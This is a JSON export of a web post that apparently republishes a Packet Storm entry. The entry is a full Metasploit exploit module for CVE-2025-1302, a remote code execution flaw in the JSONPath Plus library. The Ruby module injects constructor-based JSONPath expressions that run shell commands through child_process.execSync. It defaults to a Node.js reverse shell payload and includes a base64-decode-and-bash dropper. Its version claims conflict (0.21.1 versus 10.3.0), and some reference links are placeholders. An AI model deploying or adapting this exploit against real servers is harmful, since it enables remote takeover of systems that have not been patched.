{"id":31877,"date":"2025-12-18T10:44:56","date_gmt":"2025-12-18T10:44:56","guid":{"rendered":"http:\/\/localhost\/?p=31877"},"modified":"2025-12-18T10:44:56","modified_gmt":"2025-12-18T10:44:56","slug":"jsonpath-plus-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=31877","title":{"rendered":"\ud83d\udcc4 JSONPath Plus Remote Code Execution_PACKETSTORM:212982"},"content":{"rendered":"

{“lastseen”:”2025-12-18T15:54:38″,”description”:”This Metasploit module exploits a remote code execution vulnerability in JSONPath Plus library versions prior to 10.3.0 The vulnerability allows arbitrary JavaScript code execution through malicious JSONPath expressions…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 JSONPath Plus Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212982″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-1302″],”sourceData”:”=============================================================================================================================================\\n | # Title : JSONPath Plus \\u003c 10.3.0 Remote Code Execution Exploitation Framework |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/github.com\/JSONPath-Plus\/JSONPath |\\n =============================================================================================================================================\\n \\n POC : \\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212004\/ \\u0026 \\tCVE-2025-1302\\n \\n \\n [+] Summary : \\n \\n CVE-2025-1302 is a critical remote code execution vulnerability in JSONPath Plus library versions prior to 10.3.0. \\n \\t\\tThe vulnerability allows attackers to execute arbitrary JavaScript code through maliciously crafted JSONPath expressions, leading to complete system compromise.\\n \\t\\tThe vulnerability exists in the JSONPath expression parser where user input is improperly sanitized before being evaluated as JavaScript code. Attackers can exploit constructor properties to break out of the JSONPath context and execute arbitrary system commands.\\n \\n \\n \\n [+] POC :\\n \\n ##\\n # Module: exploit\/multi\/http\/jsonpath_plus_rce\\n # Version: 1.0\\n # Author: indoushka\\n ##\\n \\n require ‘msf\/core’\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::CmdStager\\n \\n def initialize(info = {})\\n super(update_info(info,\\n ‘Name’ =\\u003e ‘JSONPath Plus RCE (CVE-2025-1302)’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a remote code execution vulnerability in JSONPath Plus\\n library versions prior to 0.21.1. The vulnerability allows arbitrary JavaScript\\n code execution through malicious JSONPath expressions.\\n },\\n ‘Author’ =\\u003e [‘indoushka’],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-1302’],\\n [‘URL’, ‘https:\/\/github.com\/JSONPath-Plus\/JSONPath\/issues\/XXX’],\\n [‘URL’, ‘https:\/\/security.snyk.io\/vuln\/SNYK-JS-JSONPATHPLUS-XXX’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-11-26’,\\n ‘Platform’ =\\u003e [‘nodejs’, ‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e [ARCH_CMD, ARCH_NODEJS, ARCH_X64, ARCH_X86],\\n ‘Payload’ =\\u003e {‘BadChars’ =\\u003e ”, ‘Space’ =\\u003e 8192},\\n ‘Targets’ =\\u003e [\\n [‘Automatic’, {}],\\n [‘Node.js’, {‘Arch’ =\\u003e ARCH_NODEJS, ‘Platform’ =\\u003e ‘nodejs’}],\\n [‘Unix Command’, {‘Arch’ =\\u003e ARCH_CMD, ‘Platform’ =\\u003e ‘unix’}],\\n [‘Linux Dropper’, {‘Arch’ =\\u003e [ARCH_X64, ARCH_X86], ‘Platform’ =\\u003e ‘linux’}]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘SSL’ =\\u003e false,\\n ‘RPORT’ =\\u003e 3000,\\n ‘PAYLOAD’ =\\u003e ‘nodejs\/shell_reverse_tcp’\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n }\\n ))\\n \\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘The base path to the vulnerable endpoint’, ‘\/’]),\\n OptEnum.new(‘METHOD’, [true, ‘HTTP method to use’, ‘AUTO’, [‘POST’, ‘GET’, ‘AUTO’]]),\\n OptBool.new(‘NO_FALLBACK’, [false, ‘Disable GET fallback’, false]),\\n OptInt.new(‘DELAY’, [false, ‘Delay before exploitation (seconds)’, 0]),\\n OptString.new(‘PAYLOAD_FILE’, [false, ‘Path to custom payload file’]),\\n OptBool.new(‘VERBOSE’, [false, ‘Enable verbose output’, false])\\n ])\\n \\n register_advanced_options([\\n OptString.new(‘CustomPayload’, [false, ‘Custom JSONPath payload’]),\\n OptBool.new(‘DebugRequests’, [false, ‘Debug HTTP requests\/responses’, false])\\n ])\\n end\\n \\n def check\\n test_payload = ‘$[?(@.constructor.constructor(\\”return process.version\\”)())]’\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e { ‘path’ =\\u003e test_payload }.to_json\\n })\\n \\n return CheckCode::Unknown(‘No response from target’) unless res\\n \\n if res.body.include?(‘v’) \\u0026\\u0026 res.body =~ \/\\\\d+\\\\.\\\\d+\\\\.\\\\d+\/\\n return CheckCode::Appears(\\”Node.js version detected: #{res.body}\\”)\\n end\\n \\n CheckCode::Safe\\n end\\n \\n def exploit\\n print_status(\\”Starting exploitation for CVE-2025-1302\\”)\\n \\n # Apply delay if specified\\n if datastore[‘DELAY’] \\u003e 0\\n print_status(\\”Delaying #{datastore[‘DELAY’]} seconds before exploitation…\\”)\\n delay_progress(datastore[‘DELAY’])\\n end\\n \\n # Determine payload based on target\\n payload = generate_payload\\n print_status(\\”Generated payload: #{payload[0..100]}…\\”) if datastore[‘VERBOSE’]\\n \\n # Execute exploitation\\n case target[‘Platform’]\\n when ‘nodejs’\\n exploit_nodejs(payload)\\n when ‘unix’\\n exploit_unix(payload)\\n when ‘linux’\\n exploit_linux(payload)\\n else\\n exploit_auto(payload)\\n end\\n end\\n \\n def generate_payload\\n if datastore[‘CustomPayload’]\\n return datastore[‘CustomPayload’]\\n end\\n \\n case target[‘Platform’]\\n when ‘nodejs’\\n generate_nodejs_payload\\n when ‘unix’, ‘linux’\\n generate_cmd_payload\\n else\\n # Auto-detect based on selected payload\\n if payload_instance.name.include?(‘nodejs’)\\n generate_nodejs_payload\\n else\\n generate_cmd_payload\\n end\\n end\\n end\\n \\n def generate_nodejs_payload\\n cmd = payload.encoded\\n # Escape for JavaScript string\\n escaped_cmd = cmd.gsub(‘\\”‘, ‘\\\\\\”‘).gsub(\\”‘\\”, \\”\\\\\\\\’\\”)\\n \\n %Q{$[?(@.constructor.constructor(\\”require(‘child_process’).execSync(‘#{escaped_cmd}’)\\”)())]}\\n end\\n \\n def generate_cmd_payload\\n case target[‘Platform’]\\n when ‘unix’\\n cmd = payload.encoded\\n %Q{$[?(@.constructor.constructor(\\”require(‘child_process’).execSync(‘#{cmd.gsub(\\”‘\\”, \\”\\\\\\\\’\\”)}’)\\”)())]}\\n when ‘linux’\\n # For Linux dropper, we need a different approach\\n %Q{$[?(@.constructor.constructor(\\”require(‘child_process’).execSync(‘bash -c \\\\\\\\\\\\\\”#{Rex::Text.encode_base64(payload.encoded)}\\\\\\\\\\\\\\” | base64 -d | bash’)\\”)())]}\\n else\\n generate_nodejs_payload\\n end\\n end\\n \\n def exploit_auto(payload_str)\\n method = datastore[‘NO_FALLBACK’] ? ‘POST’ : datastore[‘METHOD’]\\n \\n case method\\n when ‘POST’\\n send_post_request(payload_str)\\n when ‘GET’\\n send_get_request(payload_str)\\n when ‘AUTO’\\n exploit_with_fallback(payload_str)\\n end\\n end\\n \\n def exploit_with_fallback(payload_str)\\n print_status(\\”Attempting POST request…\\”)\\n res = send_post_request(payload_str)\\n \\n if res \\u0026\\u0026 (res.code \\u003c 400)\\n print_good(\\”POST request successful\\”)\\n return true\\n end\\n \\n print_status(\\”POST failed, falling back to GET…\\”)\\n res = send_get_request(payload_str)\\n \\n if res \\u0026\\u0026 (res.code \\u003c 400)\\n print_good(\\”GET request successful\\”)\\n return true\\n end\\n \\n fail_with(Failure::Unknown, \\”Both POST and GET methods failed\\”)\\n end\\n \\n def send_post_request(payload_str)\\n data = { ‘path’ =\\u003e payload_str }.to_json\\n \\n print_status(\\”Sending POST request with payload\\”) if datastore[‘VERBOSE’]\\n debug_request(‘POST’, data) if datastore[‘DebugRequests’]\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e data\\n }, datastore[‘HTTP_TIMEOUT’] || 10)\\n \\n debug_response(res) if datastore[‘DebugRequests’] \\u0026\\u0026 res\\n handle_response(res, ‘POST’)\\n end\\n \\n def send_get_request(payload_str)\\n print_status(\\”Sending GET request with payload\\”) if datastore[‘VERBOSE’]\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘vars_get’ =\\u003e { ‘path’ =\\u003e payload_str }\\n }, datastore[‘HTTP_TIMEOUT’] || 10)\\n \\n debug_response(res) if datastore[‘DebugRequests’] \\u0026\\u0026 res\\n handle_response(res, ‘GET’)\\n end\\n \\n def handle_response(res, method)\\n unless res\\n print_error(\\”#{method} request failed – no response\\”)\\n return nil\\n end\\n \\n if datastore[‘VERBOSE’]\\n print_status(\\”#{method} Response: Code=#{res.code}, Body=#{res.body[0..200]}…\\”)\\n end\\n \\n if res.code \\u003e= 400\\n print_error(\\”#{method} request failed with code #{res.code}\\”)\\n return nil\\n end\\n \\n res\\n end\\n \\n def exploit_nodejs(payload_str)\\n print_status(\\”Exploiting Node.js target…\\”)\\n exploit_auto(payload_str)\\n \\n # For Node.js payloads, we need to handle the session differently\\n if payload_instance.respond_to?(:handle_connection)\\n handler\\n end\\n end\\n \\n def exploit_unix(payload_str)\\n print_status(\\”Exploiting Unix command target…\\”)\\n exploit_auto(payload_str)\\n end\\n \\n def exploit_linux(payload_str)\\n print_status(\\”Exploiting Linux target with dropper…\\”)\\n \\n # Use cmd stager for Linux targets\\n execute_cmdstager({\\n :linemax =\\u003e 8000,\\n :nodelete =\\u003e true\\n })\\n end\\n \\n def execute_command(cmd, opts = {})\\n payload_str = %Q{$[?(@.constructor.constructor(\\”require(‘child_process’).execSync(‘#{cmd.gsub(\\”‘\\”, \\”\\\\\\\\’\\”)}’)\\”)())]}\\n exploit_auto(payload_str)\\n end\\n \\n def delay_progress(seconds)\\n return if seconds \\u003c= 0\\n \\n print_status(\\”Waiting #{seconds} seconds…\\”)\\n 1.upto(seconds) do |i|\\n print_status(\\”Delay: #{i}\/#{seconds}\\”) if i % 5 == 0 || i \\u003c= 3\\n sleep(1)\\n end\\n end\\n \\n def debug_request(method, data)\\n print_status(\\”[DEBUG #{Time.now.utc.iso8601}] #{method} Request:\\”)\\n print_status(\\”Data: #{data}\\”)\\n end\\n \\n def debug_response(res)\\n return unless res\\n \\n print_status(\\”[DEBUG #{Time.now.utc.iso8601}] Response:\\”)\\n print_status(\\”Status: #{res.code}\\”)\\n print_status(\\”Headers: #{res.headers}\\”)\\n print_status(\\”Body: #{res.body}\\”)\\n end\\n \\n def load_custom_payloads(file_path)\\n return [] unless File.exist?(file_path)\\n \\n payloads = []\\n File.readlines(file_path).each do |line|\\n next if line.strip.empty?\\n payloads \\u003c\\u003c line.strip\\n end\\n payloads\\n end\\n end\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212982″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212982\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-18T15:54:38″,”description”:”This Metasploit module exploits a remote code execution vulnerability in JSONPath Plus library versions prior to 10.3.0 The vulnerability allows arbitrary JavaScript code execution through…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-31877","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 JSONPath Plus Remote Code Execution_PACKETSTORM:212982 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=31877\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 JSONPath Plus Remote Code Execution_PACKETSTORM:212982 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-18T15:54:38″,”description”:”This Metasploit module exploits a remote code execution vulnerability in JSONPath Plus library versions prior to 10.3.0 The vulnerability allows arbitrary JavaScript code execution through...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=31877\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-18T10:44:56+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31877#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31877\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 JSONPath Plus Remote Code Execution_PACKETSTORM:212982\",\"datePublished\":\"2025-12-18T10:44:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31877\"},\"wordCount\":1683,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31877#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31877\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31877\",\"name\":\"\ud83d\udcc4 JSONPath Plus Remote Code Execution_PACKETSTORM:212982 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-18T10:44:56+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31877#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31877\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31877#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 JSONPath Plus Remote Code Execution_PACKETSTORM:212982\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 JSONPath Plus Remote Code Execution_PACKETSTORM:212982 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=31877","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 JSONPath Plus Remote Code Execution_PACKETSTORM:212982 - zero redgem","og_description":"{“lastseen”:”2025-12-18T15:54:38″,”description”:”This Metasploit module exploits a remote code execution vulnerability in JSONPath Plus library versions prior to 10.3.0 The vulnerability allows arbitrary JavaScript code execution through...","og_url":"https:\/\/zero.redgem.net\/?p=31877","og_site_name":"zero redgem","article_published_time":"2025-12-18T10:44:56+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=31877#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=31877"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 JSONPath Plus Remote Code Execution_PACKETSTORM:212982","datePublished":"2025-12-18T10:44:56+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=31877"},"wordCount":1683,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=31877#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=31877","url":"https:\/\/zero.redgem.net\/?p=31877","name":"\ud83d\udcc4 JSONPath Plus Remote Code Execution_PACKETSTORM:212982 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-18T10:44:56+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=31877#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=31877"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=31877#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 JSONPath Plus Remote Code Execution_PACKETSTORM:212982"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31877","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=31877"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31877\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=31877"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=31877"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=31877"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}